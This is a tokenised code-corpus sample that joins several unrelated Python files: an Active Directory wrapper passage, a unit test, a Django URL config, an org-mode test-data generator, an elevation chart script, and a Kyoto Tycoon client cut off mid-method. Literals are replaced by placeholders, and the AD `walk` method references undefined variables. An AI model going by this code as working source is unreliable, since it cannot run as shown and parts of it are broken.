ADsPath <EOL> @ classmethod <EOL> def from_string ( cls , moniker , username = None , password = None , interface = adsi . IID_IADs ) : <EOL> return cls . from_object ( <EOL> adsi . ADsOpenObject ( <EOL> moniker , <EOL> username , password , <EOL> adsicon . ADS_SECURE_AUTHENTICATION | adsicon . ADS_SERVER_BIND | adsicon . ADS_FAST_BIND , <EOL> interface <EOL> ) <EOL> ) <EOL> @ classmethod <EOL> def from_object ( cls , obj ) : <EOL> klass = CLASS_MAP . get ( obj . QueryInterface ( adsi . IID_IADs ) . Class . lower ( ) , cls ) <EOL> return klass ( obj ) <EOL> def __iter__ ( self ) : <EOL> try : <EOL> enumerator = adsi . ADsBuildEnumerator ( <EOL> self . _obj . QueryInterface ( <EOL> adsi . IID_IADsContainer <EOL> ) <EOL> ) <EOL> except : <EOL> raise TypeError ( "<STR_LIT>" % self ) <EOL> while True : <EOL> item = adsi . ADsEnumerateNext ( enumerator , <NUM_LIT:1> ) <EOL> if item : <EOL> yield IADs . from_object ( item [ <NUM_LIT:0> ] ) <EOL> else : <EOL> break <EOL> def walk ( self , depthfirst = False ) : <EOL> """<STR_LIT>""" <EOL> top = self <EOL> containers , items = [ ] , [ ] <EOL> for item in self : <EOL> if isinstance ( f , Dir ) : <EOL> dirs . append ( f ) <EOL> else : <EOL> nondirs . append ( f ) <EOL> if not depthfirst : yield top , dirs , nondirs <EOL> for d in dirs : <EOL> for x in d . walk ( depthfirst = depthfirst , ignore_access_errors = ignore_access_errors ) : <EOL> yield x <EOL> if depthfirst : yield top , dirs , nondirs <EOL> class IADsOU ( IADs ) : <EOL> def __init__ ( self , obj ) : <EOL> IADs . __init__ ( self , obj ) <EOL> class IADsUser ( IADs ) : <EOL> def __init__ ( self , obj ) : <EOL> IADs . __init__ ( self , obj ) <EOL> class IADsGroup ( IADs ) : <EOL> def __init__ ( self , obj ) : <EOL> IADs . __init__ ( self , obj ) <EOL> class GC ( IADs ) : <EOL> def __iter__ ( self ) : <EOL> for domain in IADs . __iter__ ( self ) : <EOL> yield ad ( "<STR_LIT>" + domain . Name ) <EOL> def ad ( obj = core . 
UNSET , username = None , password = None , interface = adsi . IID_IADs ) : <EOL> if obj is core . UNSET : <EOL> return IADs . from_string ( ldap_moniker ( username = username , password = password ) , username , password ) <EOL> elif obj is None : <EOL> return None <EOL> elif isinstance ( obj , IADs ) : <EOL> return obj <EOL> elif isinstance ( obj , basestring ) : <EOL> moniker = obj <EOL> if not moniker . upper ( ) . startswith ( "<STR_LIT>" ) : <EOL> moniker = "<STR_LIT>" + moniker <EOL> return IADs . from_string ( moniker , username , password , interface ) <EOL> else : <EOL> return IADs . from_object ( obj ) <EOL> def ldap_moniker ( root = None , server = None , username = None , password = None ) : <EOL> if root is None : <EOL> root = adsi . ADsOpenObject ( <EOL> ldap_moniker ( "<STR_LIT>" , server ) , <EOL> username , password , <EOL> adsicon . ADS_SECURE_AUTHENTICATION | adsicon . ADS_SERVER_BIND | adsicon . ADS_FAST_BIND , <EOL> adsi . IID_IADs <EOL> ) . Get ( "<STR_LIT>" ) <EOL> prefix , rest = re . match ( "<STR_LIT>" , root ) . groups ( ) <EOL> if not prefix : <EOL> prefix = "<STR_LIT>" <EOL> if server : <EOL> return "<STR_LIT>" % ( prefix , server , root ) <EOL> else : <EOL> return "<STR_LIT>" % ( prefix , root ) <EOL> def _search ( filter , root = None , server = None , username = None , password = None ) : <EOL> def get_column_value ( hSearch , column ) : <EOL> CONVERT_TO_LIST = set ( [ '<STR_LIT>' , "<STR_LIT>" ] ) <EOL> try : <EOL> column_name , column_type , column_values = directory_search . GetColumn ( hSearch , column ) <EOL> if column_name in CONVERT_TO_LIST : <EOL> return list ( value for value , type in column_values ) <EOL> else : <EOL> for value , type in column_values : <EOL> return value <EOL> except adsi . error : <EOL> details = sys . exc_info ( ) [ <NUM_LIT:1> ] <EOL> if details [ <NUM_LIT:0> ] == adsicon . E_ADS_COLUMN_NOT_SET : <EOL> return None <EOL> else : <EOL> raise <EOL> pythoncom . 
CoInitialize ( ) <EOL> try : <EOL> directory_search = adsi . ADsOpenObject ( <EOL> ldap_moniker ( root , server , username , password ) , <EOL> username , password , <EOL> adsicon . ADS_SECURE_AUTHENTICATION | adsicon . ADS_SERVER_BIND | adsicon . ADS_FAST_BIND , <EOL> adsi . IID_IDirectorySearch <EOL> ) <EOL> directory_search . SetSearchPreference ( [ ( k , ( v , ) ) for k , v in SEARCH_PREFERENCES . items ( ) ] ) <EOL> hSearch = directory_search . ExecuteSearch ( filter , columns ) <EOL> try : <EOL> hResult = directory_search . GetFirstRow ( hSearch ) <EOL> while hResult == <NUM_LIT:0> : <EOL> yield Result ( ( column , get_column_value ( hSearch , column ) ) for column in columns ) <EOL> hResult = directory_search . GetNextRow ( hSearch ) <EOL> finally : <EOL> directory_search . AbandonSearch ( hSearch ) <EOL> directory_search . CloseSearchHandle ( hSearch ) <EOL> finally : <EOL> pythoncom . CoUninitialize ( ) <EOL> def _and ( * args ) : <EOL> return "<STR_LIT>" % "<STR_LIT>" . join ( "<STR_LIT>" % s for s in args ) <EOL> def _or ( * args ) : <EOL> return "<STR_LIT>" % "<STR_LIT>" . 
join ( "<STR_LIT>" % s for s in args ) <EOL> def find_user ( name , root_path = None , server = None , username = None , password = None , columns = [ "<STR_LIT:*>" ] ) : <EOL> name = escaped ( name ) <EOL> for user in search ( <EOL> _and ( <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> _or ( <EOL> "<STR_LIT>" + name , <EOL> "<STR_LIT>" + name , <EOL> "<STR_LIT>" + name <EOL> ) <EOL> ) , <EOL> [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT:title>" , "<STR_LIT>" , "<STR_LIT>" ] , <EOL> root_path , <EOL> server , <EOL> username , <EOL> password <EOL> ) : <EOL> return user <EOL> def find_group ( name , root_path = None , server = None , username = None , password = None , columns = [ "<STR_LIT:*>" ] ) : <EOL> name = escaped ( name ) <EOL> for group in search ( <EOL> filter = _and ( <EOL> "<STR_LIT>" , <EOL> _or ( <EOL> "<STR_LIT>" + name , <EOL> "<STR_LIT>" + name , <EOL> "<STR_LIT>" + name <EOL> ) <EOL> ) , <EOL> columns = columns , <EOL> root = root_path , server = server , username = username , password = password <EOL> ) : <EOL> return group <EOL> def find_active_users ( root = None , server = None , username = None , password = None , columns = [ "<STR_LIT:*>" ] ) : <EOL> return search ( <EOL> filter = _and ( <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> ) , <EOL> columns = columns , <EOL> root = None , server = None , username = None , password = None <EOL> ) <EOL> def find_all_users ( root = None , server = None , username = None , password = None ) : <EOL> for user in search ( <EOL> filter = _and ( <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> ) , <EOL> columns = [ "<STR_LIT>" ] , <EOL> root = None , server = None , username = None , password = None <EOL> ) : <EOL> yield ad ( user . distinguishedName ) <EOL> def find_all_namespaces ( ) : <EOL> for i in win32com . client . GetObject ( "<STR_LIT>" ) : <EOL> yield i . 
ADsPath <EOL> def gc ( ) : <EOL> return ad ( "<STR_LIT>" ) <EOL> CLASS_MAP = { <EOL> "<STR_LIT>" : IADsOU , <EOL> "<STR_LIT:user>" : IADsUser , <EOL> "<STR_LIT>" : IADsGroup , <EOL> } </s>
<s> from __future__ import unicode_literals <EOL> import os , sys <EOL> from winsys . _compat import unittest <EOL> from winsys . _compat import * <EOL> from winsys . tests import utils as testutils <EOL> from winsys import constants <EOL> class A ( object ) : <EOL> zero = <NUM_LIT:0> <EOL> x = <NUM_LIT:1> <EOL> y = <NUM_LIT:2> <EOL> z = <NUM_LIT:4> <EOL> f_a = <NUM_LIT:8> <EOL> f_b = <NUM_LIT:16> <EOL> f_c = <NUM_LIT:32> <EOL> class TestBasic ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def test_from_pattern_no_pattern ( self ) : <EOL> self . assertEqual ( constants . from_pattern ( None , "<STR_LIT:abc>" ) , "<STR_LIT:abc>" ) <EOL> def test_from_pattern ( self ) : <EOL> self . assertEqual ( constants . from_pattern ( "<STR_LIT>" , "<STR_LIT>" ) , "<STR_LIT:abc>" ) <EOL> def test_constants_from_list ( self ) : <EOL> c = constants . Constants . from_list ( [ '<STR_LIT:x>' , '<STR_LIT:y>' , '<STR_LIT:z>' ] , namespace = A ) <EOL> self . assertEqual ( c . x , A . x ) <EOL> self . assertEqual ( c [ '<STR_LIT:x>' ] , A . x ) <EOL> def test_constants_from_pattern ( self ) : <EOL> c = constants . Constants . from_pattern ( "<STR_LIT>" , namespace = A ) <EOL> self . assertEqual ( c . a , A . f_a ) <EOL> self . assertEqual ( c [ '<STR_LIT:b>' ] , A . f_b ) <EOL> self . assertEqual ( c . c , A . f_c ) <EOL> def test_constants_from_pattern_with_exclusion ( self ) : <EOL> c = constants . Constants . from_pattern ( "<STR_LIT>" , excluded = [ "<STR_LIT>" ] , namespace = A ) <EOL> self . assertEqual ( c . a , A . f_a ) <EOL> self . assertEqual ( c [ '<STR_LIT:c>' ] , A . f_c ) <EOL> self . assertRaises ( AttributeError , getattr , c , "<STR_LIT:b>" ) <EOL> def test_name_from_value ( self ) : <EOL> c = constants . Constants . from_pattern ( namespace = A ) <EOL> self . assertEqual ( c . name_from_value ( <NUM_LIT:0> ) , "<STR_LIT>" ) <EOL> self . assertEqual ( c . 
name_from_value ( <NUM_LIT:32> ) , "<STR_LIT>" ) <EOL> def test_names_from_value_nonzero ( self ) : <EOL> c = constants . Constants . from_pattern ( namespace = A ) <EOL> self . assertEqual ( c . names_from_value ( <NUM_LIT:4> ) , [ "<STR_LIT:z>" ] ) <EOL> def test_names_from_value_zero ( self ) : <EOL> c = constants . Constants . from_pattern ( namespace = A ) <EOL> self . assertEqual ( c . names_from_value ( <NUM_LIT:0> ) , [ "<STR_LIT>" ] ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> unittest . main ( ) <EOL> if sys . stdout . isatty ( ) : raw_input ( "<STR_LIT>" ) </s>
<s> try : <EOL> from django . conf . urls import patterns , url <EOL> except ImportError : <EOL> from django . conf . urls . defaults import patterns , url <EOL> from subdomains . tests . urls . default import urlpatterns as default_patterns <EOL> from subdomains . tests . views import view <EOL> urlpatterns = default_patterns + patterns ( '<STR_LIT>' , <EOL> url ( regex = r'<STR_LIT>' , view = view , name = '<STR_LIT>' ) , <EOL> url ( regex = r'<STR_LIT>' , view = view , name = '<STR_LIT>' ) , <EOL> ) </s>
<s> import random <EOL> import datetime <EOL> from . utils . date import timedeltastr , total_seconds <EOL> class RandomDatetime ( object ) : <EOL> def __init__ ( self , pre_days = <NUM_LIT:30> , post_days = <NUM_LIT:30> , hour_min = <NUM_LIT:6> , hour_max = <NUM_LIT> ) : <EOL> self . pre_days = pre_days <EOL> self . post_days = post_days <EOL> self . hour_min = hour_min <EOL> self . hour_max = hour_max <EOL> self . now = datetime . datetime . now ( ) <EOL> self . zero = datetime . datetime ( * self . now . timetuple ( ) [ : <NUM_LIT:3> ] ) <EOL> def datetime ( self , pre = None , post = None ) : <EOL> pre = self . pre_days if pre is None else pre <EOL> post = self . post_days if post is None else post <EOL> delta = datetime . timedelta ( <EOL> random . randrange ( - pre , post + <NUM_LIT:1> ) , <EOL> random . randrange ( self . hour_min , self . hour_max ) * <NUM_LIT> * <NUM_LIT> ) <EOL> return self . zero + delta <EOL> def date ( self , ** kwds ) : <EOL> return datetime . date ( * self . datetime ( ** kwds ) . timetuple ( ) [ : <NUM_LIT:3> ] ) <EOL> def datetimerange ( self , ** kwds ) : <EOL> return self . _start_end ( self . datetime ( ** kwds ) , self . datetime ( ** kwds ) ) <EOL> def daterange ( self , ** kwds ) : <EOL> return self . _start_end ( self . datetime ( ** kwds ) , self . datetime ( ** kwds ) ) <EOL> @ staticmethod <EOL> def _start_end ( d1 , d2 ) : <EOL> if total_seconds ( d1 - d2 ) < <NUM_LIT:0> : <EOL> return ( d1 , d2 ) <EOL> else : <EOL> return ( d2 , d1 ) <EOL> def node ( level , heading , todo = None , scheduled = None , deadline = None , <EOL> closed = None , clock = [ ] , tags = [ ] , datelist = [ ] , rangelist = [ ] ) : <EOL> active_datestr = lambda x : x . strftime ( '<STR_LIT>' ) <EOL> inactive_datestr = lambda x : x . strftime ( '<STR_LIT>' ) <EOL> yield '<STR_LIT:*>' * level <EOL> yield '<STR_LIT:U+0020>' <EOL> if todo : <EOL> yield todo <EOL> yield '<STR_LIT:U+0020>' <EOL> yield heading <EOL> if tags : <EOL> yield '<STR_LIT>' . 
format ( '<STR_LIT::>' . join ( tags ) ) <EOL> yield '<STR_LIT:\n>' <EOL> if scheduled or deadline or closed : <EOL> yield '<STR_LIT:U+0020>' * level <EOL> for ( name , date , datestr ) in [ ( '<STR_LIT>' , closed , inactive_datestr ) , <EOL> ( '<STR_LIT>' , deadline , active_datestr ) , <EOL> ( '<STR_LIT>' , scheduled , active_datestr ) ] : <EOL> if date : <EOL> yield '<STR_LIT:U+0020>' <EOL> yield name <EOL> yield '<STR_LIT>' <EOL> yield datestr ( date ) <EOL> if scheduled or deadline or closed : <EOL> yield '<STR_LIT:\n>' <EOL> for ( clock_start , clock_end ) in clock : <EOL> yield '<STR_LIT:U+0020>' * ( level + <NUM_LIT:1> ) <EOL> yield '<STR_LIT>' <EOL> yield inactive_datestr ( clock_start ) <EOL> yield '<STR_LIT>' <EOL> yield inactive_datestr ( clock_end ) <EOL> yield '<STR_LIT>' <EOL> yield timedeltastr ( clock_end - clock_start ) <EOL> yield '<STR_LIT:\n>' <EOL> for date in datelist : <EOL> yield inactive_datestr ( date ) <EOL> yield '<STR_LIT:\n>' <EOL> for ( start , end ) in rangelist : <EOL> yield inactive_datestr ( start ) <EOL> yield '<STR_LIT>' <EOL> yield inactive_datestr ( end ) <EOL> yield '<STR_LIT:\n>' <EOL> def makeorg ( num , ** kwds ) : <EOL> heading_pops = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> tags_pops = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:action>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> true_or_false = [ True , False ] <EOL> rd = RandomDatetime ( ** kwds ) <EOL> for i in range ( num ) : <EOL> kwds = { } <EOL> if i == <NUM_LIT:0> : <EOL> kwds [ '<STR_LIT>' ] = <NUM_LIT:1> <EOL> else : <EOL> kwds [ '<STR_LIT>' ] = random . randrange ( <NUM_LIT:1> , <NUM_LIT:4> ) <EOL> kwds [ '<STR_LIT>' ] = random . choice ( heading_pops ) <EOL> if random . choice ( true_or_false ) : <EOL> if random . choice ( true_or_false ) : <EOL> kwds [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> else : <EOL> kwds [ '<STR_LIT>' ] = rd . 
datetime ( post = <NUM_LIT:0> ) <EOL> kwds [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> for sdc in [ '<STR_LIT>' , '<STR_LIT>' ] : <EOL> if random . choice ( true_or_false ) : <EOL> kwds [ sdc ] = rd . date ( ) <EOL> if random . choice ( true_or_false ) : <EOL> kwds [ '<STR_LIT>' ] = clock = [ ] <EOL> for _ in range ( random . randrange ( <NUM_LIT:1> , <NUM_LIT:5> ) ) : <EOL> start = rd . datetime ( post = <NUM_LIT:0> ) <EOL> end = start + datetime . timedelta ( <EOL> <NUM_LIT:0> , random . randrange ( <NUM_LIT:30> , <NUM_LIT> ) * <NUM_LIT> ) <EOL> clock . append ( ( start , end ) ) <EOL> if random . choice ( true_or_false ) : <EOL> kwds [ '<STR_LIT>' ] = [ random . choice ( tags_pops ) ] <EOL> if random . choice ( true_or_false ) : <EOL> if random . choice ( true_or_false ) : <EOL> kwds [ '<STR_LIT>' ] = [ <EOL> rd . datetime ( ) <EOL> for _ in range ( random . randrange ( <NUM_LIT:1> , <NUM_LIT:5> ) ) ] <EOL> else : <EOL> kwds [ '<STR_LIT>' ] = [ <EOL> rd . datetimerange ( ) <EOL> for _ in range ( random . randrange ( <NUM_LIT:1> , <NUM_LIT:5> ) ) ] <EOL> for s in node ( ** kwds ) : <EOL> yield s <EOL> def writeorg ( file , * args , ** kwds ) : <EOL> file . writelines ( makeorg ( * args , ** kwds ) ) <EOL> def run ( num ) : <EOL> import sys <EOL> writeorg ( sys . stdout , num ) </s>
<s> import gpxpy as mod_gpxpy <EOL> import cartesius . main as mod_cartesius <EOL> import cartesius . charts as mod_charts <EOL> import cartesius . elements as mod_elements <EOL> import logging as mod_logging <EOL> import srtm as mod_srtm <EOL> mod_logging . basicConfig ( level = mod_logging . DEBUG , <EOL> format = '<STR_LIT>' ) <EOL> def get_line ( gpx , color , transparency_mask = None ) : <EOL> def f ( ) : <EOL> previous_point = None <EOL> length = <NUM_LIT:0> <EOL> for point in gpx . walk ( only_points = True ) : <EOL> if previous_point : <EOL> length += previous_point . distance_2d ( point ) <EOL> previous_point = point <EOL> yield mod_charts . data ( length , point . elevation ) <EOL> return mod_charts . LineChart ( data = f , color = color , transparency_mask = transparency_mask ) <EOL> def sample_gpx ( ) : <EOL> return mod_gpxpy . parse ( open ( '<STR_LIT>' ) ) <EOL> coordinate_system = mod_cartesius . CoordinateSystem ( bounds = ( - <NUM_LIT> , <NUM_LIT> , - <NUM_LIT> , <NUM_LIT> ) ) <EOL> coordinate_system . add ( mod_elements . Grid ( <NUM_LIT:20> , <NUM_LIT:100> ) ) <EOL> gpx = sample_gpx ( ) <EOL> coordinate_system . add ( get_line ( gpx , color = ( <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ) ) ) <EOL> data = mod_srtm . get_data ( ) <EOL> gpx = sample_gpx ( ) <EOL> data . add_elevations ( gpx ) <EOL> coordinate_system . add ( get_line ( gpx , color = ( <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:255> ) , transparency_mask = <NUM_LIT> ) ) <EOL> gpx = sample_gpx ( ) <EOL> data . add_elevations ( gpx , smooth = True ) <EOL> coordinate_system . add ( get_line ( gpx , color = ( <NUM_LIT:255> , <NUM_LIT:0> , <NUM_LIT:0> ) ) ) <EOL> coordinate_system . add ( mod_elements . Axis ( horizontal = True , labels = <NUM_LIT> , points = <NUM_LIT:100> ) ) <EOL> coordinate_system . add ( mod_elements . Axis ( vertical = True , labels = <NUM_LIT:100> , points = <NUM_LIT:20> ) ) <EOL> image = coordinate_system . draw ( <NUM_LIT> , <NUM_LIT> , antialiasing = True ) <EOL> image . 
save ( '<STR_LIT>' ) </s>
<s> import httplib <EOL> import urllib <EOL> import struct <EOL> import time <EOL> import kt_error <EOL> try : <EOL> import cPickle as pickle <EOL> except ImportError : <EOL> import pickle <EOL> KT_HTTP_HEADER = { <EOL> '<STR_LIT:Content-Type>' : '<STR_LIT>' , <EOL> } <EOL> KT_PACKER_CUSTOM = <NUM_LIT:0> <EOL> KT_PACKER_PICKLE = <NUM_LIT:1> <EOL> KT_PACKER_JSON = <NUM_LIT:2> <EOL> KT_PACKER_STRING = <NUM_LIT:3> <EOL> class ProtocolHandler : <EOL> def __init__ ( self , pickle_protocol = <NUM_LIT:2> ) : <EOL> self . err = kt_error . KyotoTycoonError ( ) <EOL> self . pickle_protocol = pickle_protocol <EOL> self . pack = self . _pickle_packer <EOL> self . unpack = self . _pickle_unpacker <EOL> self . pack_type = KT_PACKER_PICKLE <EOL> def error ( self ) : <EOL> return self . err <EOL> def open ( self , host , port , timeout ) : <EOL> try : <EOL> self . conn = httplib . HTTPConnection ( host , port , timeout ) <EOL> except Exception , e : <EOL> raise e <EOL> return True <EOL> def close ( self ) : <EOL> try : <EOL> self . conn . close ( ) <EOL> except Exception , e : <EOL> raise e <EOL> return True <EOL> def echo ( self ) : <EOL> self . conn . request ( '<STR_LIT:POST>' , '<STR_LIT>' ) <EOL> res = self . conn . getresponse ( ) <EOL> body = res . read ( ) <EOL> if res . status != <NUM_LIT:200> : <EOL> self . err . set_error ( err . EMISC ) <EOL> return False <EOL> self . err . set_success ( ) <EOL> return True <EOL> def get ( self , key , db = None ) : <EOL> if key is None : <EOL> return False <EOL> path = key <EOL> if db : <EOL> path = '<STR_LIT>' % ( db , key ) <EOL> path = urllib . quote ( path . encode ( '<STR_LIT>' ) , safe = '<STR_LIT>' ) <EOL> self . conn . request ( '<STR_LIT:GET>' , path ) <EOL> rv = self . conn . getresponse ( ) <EOL> body = rv . read ( ) <EOL> if rv . status == <NUM_LIT> : <EOL> self . err . set_error ( self . err . NOTFOUND ) <EOL> return None <EOL> self . err . set_success ( ) <EOL> return self . 
unpack ( body ) <EOL> def set_bulk ( self , kv_dict , expire , atomic , db ) : <EOL> if not isinstance ( kv_dict , dict ) : <EOL> return False <EOL> if len ( kv_dict ) < <NUM_LIT:1> : <EOL> self . err . set_error ( self . err . LOGIC ) <EOL> return False <EOL> path = '<STR_LIT>' <EOL> if db : <EOL> db = urllib . quote ( db , safe = '<STR_LIT>' ) <EOL> path += '<STR_LIT>' + db <EOL> request_body = '<STR_LIT>' <EOL> if atomic : <EOL> request_body = '<STR_LIT>' <EOL> for k , v in kv_dict . items ( ) : <EOL> k = urllib . quote ( k , safe = '<STR_LIT>' ) <EOL> v = urllib . quote ( self . pack ( v ) , safe = '<STR_LIT>' ) <EOL> request_body += '<STR_LIT:_>' + k + '<STR_LIT:\t>' + v + '<STR_LIT:\n>' <EOL> self . conn . request ( '<STR_LIT:POST>' , path , body = request_body , <EOL> headers = KT_HTTP_HEADER ) <EOL> res = self . conn . getresponse ( ) <EOL> body = res . read ( ) <EOL> if res . status != <NUM_LIT:200> : <EOL> self . err . set_error ( self . err . EMISC ) <EOL> return False <EOL> self . err . set_success ( ) <EOL> return int ( self . _tsv_to_dict ( body ) [ '<STR_LIT>' ] ) <EOL> def remove_bulk ( self , keys , atomic , db ) : <EOL> if not isinstance ( keys , list ) : <EOL> self . err . set_error ( self . err . LOGIC ) <EOL> return <NUM_LIT:0> <EOL> if len ( keys ) < <NUM_LIT:1> : <EOL> self . err . set_error ( self . err . LOGIC ) <EOL> return <NUM_LIT:0> <EOL> path = '<STR_LIT>' <EOL> if db : <EOL> db = urllib . quote ( db , safe = '<STR_LIT>' ) <EOL> path += '<STR_LIT>' + db <EOL> request_body = '<STR_LIT>' <EOL> if atomic : <EOL> request_body = '<STR_LIT>' <EOL> for key in keys : <EOL> request_body += '<STR_LIT:_>' + urllib . quote ( key , safe = '<STR_LIT>' ) + '<STR_LIT>' <EOL> self . conn . request ( '<STR_LIT:POST>' , path , body = request_body , <EOL> headers = KT_HTTP_HEADER ) <EOL> res = self . conn . getresponse ( ) <EOL> body = res . read ( ) <EOL> if res . status != <NUM_LIT:200> : <EOL> self . err . set_error ( self . err . 
EMISC ) <EOL> return False <EOL> self . err . set_success ( ) <EOL> return int ( self . _tsv_to_dict ( body ) [ '<STR_LIT>' ] ) <EOL> def get_bulk ( self , keys , atomic , db ) : <EOL> if not isinstance ( keys , list ) : <EOL> self . err . set_error ( self . err . LOGIC ) <EOL> return None <EOL> if len ( keys ) < <NUM_LIT:1> : <EOL> self . err . set_error ( self . err . LOGIC ) <EOL> return { } <EOL> path = '<STR_LIT>' <EOL> if db : <EOL> db = urllib . quote ( db , safe = '<STR_LIT>' ) <EOL> path += '<STR_LIT>' + db <EOL> request_body = '<STR_LIT>' <EOL> if atomic : <EOL> request_body = '<STR_LIT>' <EOL> for key in keys : <EOL> request_body += '<STR_LIT:_>' + urllib . quote ( key , safe = '<STR_LIT>' ) + '<STR_LIT>' <EOL> self . conn . request ( '<STR_LIT:POST>' , path , body = request_body , <EOL> headers = KT_HTTP_HEADER ) <EOL> res = self . conn . getresponse ( ) <EOL> body = res . read ( ) <EOL> if res . status != <NUM_LIT:200> : <EOL> self . err . set_error ( self . err . EMISC ) <EOL> return None <EOL> rv = { } <EOL> res_dict = self . _tsv_to_dict ( body ) <EOL> n = res_dict . pop ( '<STR_LIT>' ) <EOL> if n == <NUM_LIT:0> : <EOL> self . err . set_error ( self . err . NOTFOUND ) <EOL> return None <EOL> for k , v in res_dict . items ( ) : <EOL> if v is not None : <EOL> rv [ urllib . unquote ( k [ <NUM_LIT:1> : ] ) ] = self . unpack ( urllib . unquote ( v ) ) <EOL> self . err . set_success ( ) <EOL> return rv <EOL> def get_int ( self , key , db = None ) : <EOL> if key is None : <EOL> self . err . set_error ( self . err . LOGIC ) <EOL> return False <EOL> path = key <EOL> if db : <EOL> path = '<STR_LIT>' % ( db , key ) <EOL> path = urllib . quote ( path . encode ( '<STR_LIT>' ) , safe = '<STR_LIT>' ) <EOL> self . conn . request ( '<STR_LIT:GET>' , path ) <EOL> rv = self . conn . getresponse ( ) <EOL> buf = rv . read ( ) <EOL> if rv . status != <NUM_LIT:200> : <EOL> self . err . set_error ( self . err . NOTFOUND ) <EOL> return None <EOL> self . err . 
set_success ( ) <EOL> return struct . unpack ( '<STR_LIT>' , buf ) [ <NUM_LIT:0> ] <EOL> def vacuum ( self , db ) : <EOL> path = '<STR_LIT>' <EOL> if db : <EOL> db = urllib . quote ( db , safe = '<STR_LIT>' ) <EOL> path += '<STR_LIT>' + db <EOL> self . conn . request ( '<STR_LIT:GET>' , path ) <EOL> res = self . conn . getresponse ( ) <EOL> body = res . read ( ) <EOL> if res . status != <NUM_LIT:200> : <EOL> self . err . set_error ( self . err . EMISC ) <EOL> self . err . set_success ( ) <EOL> return res . status == <NUM_LIT:200> <EOL> def match_prefix ( self , prefix , max , db ) : <EOL> if prefix is None : <EOL> self . err . set_error ( self . err . LOGIC ) <EOL> return None <EOL> rv = [ ] <EOL> request_dict = { } <EOL> request_dict [ '<STR_LIT>' ] = prefix <EOL> if max : <EOL> request_dict [ '<STR_LIT>' ] = max <EOL> if db : <EOL> request_dict [ '<STR_LIT>' ] = db <EOL> request_body = self . _dict_to_tsv ( request_dict ) <EOL> self . conn . request ( '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> body = request_body , headers = KT_HTTP_HEADER ) <EOL> res = self . conn . getresponse ( ) <EOL> body = res . read ( ) <EOL> if res . status != <NUM_LIT:200> : <EOL> self . err . set_error ( self . err . EMISC ) <EOL> return False <EOL> res_dict = self . _tsv_to_dict ( body ) <EOL> n = res_dict . pop ( '<STR_LIT>' ) <EOL> if n == <NUM_LIT:0> : <EOL> self . err . set_error ( self . err . NOTFOUND ) <EOL> return None <EOL> for k in res_dict . keys ( ) : <EOL> rv . append ( k [ <NUM_LIT:1> : ] ) <EOL> self . err . set_success ( ) <EOL> return rv <EOL> def match_regex ( self , regex , max , db ) : <EOL> if regex is None : <EOL> self . err . set_error ( self . err . LOGIC ) <EOL> return None <EOL> path = '<STR_LIT>' <EOL> if db : <EOL> path += '<STR_LIT>' + db <EOL> request_dict = { '<STR_LIT>' : regex } <EOL> if max : <EOL> request_dict [ '<STR_LIT>' ] = max <EOL> request_body = self . _dict_to_tsv ( request_dict ) <EOL> self . conn . 
request ( '<STR_LIT:POST>' , path , body = request_body , <EOL> headers = KT_HTTP_HEADER ) <EOL> res = self . conn . getresponse ( ) <EOL> body = res . read ( ) <EOL> if res . status != <NUM_LIT:200> : <EOL> self . err . set_error ( self . err . EMISC ) <EOL> return None <EOL> rv = [ ] <EOL> res_dict = self . _tsv_to_dict ( body ) <EOL> if res_dict . pop ( '<STR_LIT>' ) < <NUM_LIT:1> : <EOL> self . err . set_error ( self . err . NOTFOUND ) <EOL> return [ ] <EOL> for k in res_dict . keys ( ) : <EOL> rv . append ( k [ <NUM_LIT:1> : ] ) <EOL> self . err . set_success ( ) <EOL> return rv <EOL> def set ( self , key , value , expire , db ) : <EOL> if key is None : <EOL> self . err . set_error ( self . err . LOGIC ) <EOL> return False <EOL> if db : <EOL> key = '<STR_LIT>' % ( db , key ) <EOL> key = urllib . quote ( key . encode ( '<STR_LIT>' ) , safe = '<STR_LIT>' ) <EOL> value = self . pack ( value ) <EOL> self . err . set_success ( ) <EOL> status = self . _rest_put ( '<STR_LIT>' , key , value , expire ) <EOL> if status != <NUM_LIT> : <EOL> self . err . set_error ( self . err . EMISC ) <EOL> return False <EOL> self . err . set_success ( ) <EOL> return True <EOL> def add ( self , key , value , expire , db ) : <EOL> if key is None : <EOL> self . err . set_error ( self . err . LOGIC ) <EOL> return False <EOL> if db : <EOL> key = '<STR_LIT>' % ( db , key ) <EOL> key = urllib . quote ( key . encode ( '<STR_LIT>' ) , safe = '<STR_LIT>' ) <EOL> value = self . pack ( value ) <EOL> status = self . _rest_put ( '<STR_LIT>' , key , value , expire ) <EOL> if status != <NUM_LIT> : <EOL> self . err . set_error ( self . err . EMISC ) <EOL> return False <EOL> self . err . set_success ( ) <EOL> return True <EOL> def cas ( self , key , old_val , new_val , expire , db ) : <EOL> if key is None : <EOL> self . err . set_error ( self . err . 
